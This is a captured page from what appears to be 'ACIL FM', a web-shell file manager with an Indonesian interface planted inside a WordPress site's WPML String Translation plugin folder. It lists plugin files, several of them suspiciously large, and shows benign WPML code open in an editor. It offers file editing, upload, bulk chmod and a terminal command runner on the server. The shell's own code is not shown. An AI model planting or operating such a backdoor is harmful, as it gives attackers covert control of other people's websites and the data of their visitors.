ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/wpml-string-translation/classes/MO/File
/
home
mhhtmff
www
site
wp-content
plugins
wpml-string-translation
classes
MO
File
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Builder.php
443 B
chmod
View
DL
Edit
Rename
Delete
FailureHooks.php
3.7 MB
chmod
View
DL
Edit
Rename
Delete
FailureHooksFactory.php
1.04 MB
chmod
View
DL
Edit
Rename
Delete
Generator.php
1.79 MB
chmod
View
DL
Edit
Rename
Delete
makeDir.php
637 B
chmod
View
DL
Edit
Rename
Delete
Manager.php
961 B
chmod
View
DL
Edit
Rename
Delete
ManagerFactory.php
282 B
chmod
View
DL
Edit
Rename
Delete
MOFactory.php
143 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/wpml-string-translation/classes/MO/File/makeDir.php
<?php namespace WPML\ST\MO\File; trait makeDir { /** * @var \WP_Filesystem_Direct */ protected $filesystem; /** @return bool */ public function maybeCreateSubdir() { $subdir = $this->getSubdir(); if ( $this->filesystem->is_dir( $subdir ) && $this->filesystem->is_writable( $subdir ) ) { return true; } $chmod = defined( 'FS_CHMOD_DIR' ) ? FS_CHMOD_DIR : 0755; return $this->filesystem->mkdir( $subdir, $chmod ); } /** * This declaration throws a "Strict standards" warning in PHP 5.6. * @todo: Remove the comment when we drop support for PHP 5.6. */ //abstract public static function getSubdir(); }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply